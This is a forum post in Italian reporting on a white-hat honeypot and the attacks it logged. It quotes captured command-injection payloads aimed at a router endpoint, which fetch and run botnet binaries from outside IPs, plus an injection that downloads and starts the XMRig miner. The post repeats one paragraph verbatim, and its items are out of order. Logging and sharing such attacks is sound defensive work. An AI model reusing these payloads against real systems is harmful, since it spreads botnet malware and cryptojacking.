Ultima modifica:
Oggi ho inaugurato il mio honeypot white hat sul mio server privato. L'honeypot impersona un sito web apparentemente innocente, ma che da dietro le quinte logga le seguenti attività:
Spoiler: sono felice che il mio honeypot funzioni.
PS. E non poteva mancare Xmrig (il co****** ha indicato anche username e password nella POST request), da 212.113.120.128 (Russia, https://www.abuseipdb.com/check/212.113.120.128):
"operation=write&country=$(id>`wget https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz && tar -xvf xmrig-6.21.0-linux-static-x64.tar.gz && cd xmrig-6.21.0 && ./xmrig --url pool.hashvault.pro:80 --user 4BK7HuHpSCsH8XM9ZmbdUXcbtd6e2FKcF1QxmCcFyt7LXHjsWTFz8QAjJVfqUg1DR5LQKMGYMC8wXh7cXZLw2wXFVM4u7yt --pass x --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14 && curl https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz && tar -xvf xmrig-6.21.0-linux-static-x64.tar.gz && cd xmrig-6.21.0 && ./xmrig --url pool.hashvault.pro:80 --user 4BK7HuHpSCsH8XM9ZmbdUXcbtd6e2FKcF1QxmCcFyt7LXHjsWTFz8QAjJVfqUg1DR5LQ"
- Indirizzo IP dell'attaccante;
- User-Agent;
- Intercetta richieste GET, POST e CONNECT, leakando il corpo della risposta;
- Leak del paese di provenienza dell'IP loggato.
- 213.204.98.238 (confermato: https://www.abuseipdb.com/check/213.204.98.238) - Quest'IP ha laciato una richiesta POST al seguente endpoint "/goform/set_LimitClient_cfg" con il valore "cookie: user=admin" e il seguente corpo "time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;" - Avast segnala "http://103.245.236.152/huhu.mpsl" come URL:Botnet
- 165.232.161.92, 43.158.217.52, 104.248.199.117 e 80.82.77.202 (verificati su Abuseipdb) inviano pacchetti di richieste GET e POST contenenti dei testi malformati, per dossare il server.
- 45.94.4.157 (confermato: https://www.abuseipdb.com/check/45.94.4.157) - Quest'IP, similmente a 213.204.98.238, invia una richiesta POST a "/goform/set_LimitClient_cfg", ma stavolta il corpo della richiesta cambia leggermente, "time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://80.66.88.71/mipsel; chmod 777 mipsel; ./mipsel", specificando inoltre i parametri Accept-Encoding: gzip, Content-Lenght: 99, e User-Agent: t.me/DeltaApi. Anche in questo caso, Avast possiede delle signature sia per il payload ricevuto che per l'endpoint che lo sta distribuendo.
Spoiler: sono felice che il mio honeypot funzioni.
PS. E non poteva mancare Xmrig (il co****** ha indicato anche username e password nella POST request), da 212.113.120.128 (Russia, https://www.abuseipdb.com/check/212.113.120.128):
"operation=write&country=$(id>`wget https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz && tar -xvf xmrig-6.21.0-linux-static-x64.tar.gz && cd xmrig-6.21.0 && ./xmrig --url pool.hashvault.pro:80 --user 4BK7HuHpSCsH8XM9ZmbdUXcbtd6e2FKcF1QxmCcFyt7LXHjsWTFz8QAjJVfqUg1DR5LQKMGYMC8wXh7cXZLw2wXFVM4u7yt --pass x --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14 && curl https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz && tar -xvf xmrig-6.21.0-linux-static-x64.tar.gz && cd xmrig-6.21.0 && ./xmrig --url pool.hashvault.pro:80 --user 4BK7HuHpSCsH8XM9ZmbdUXcbtd6e2FKcF1QxmCcFyt7LXHjsWTFz8QAjJVfqUg1DR5LQ"
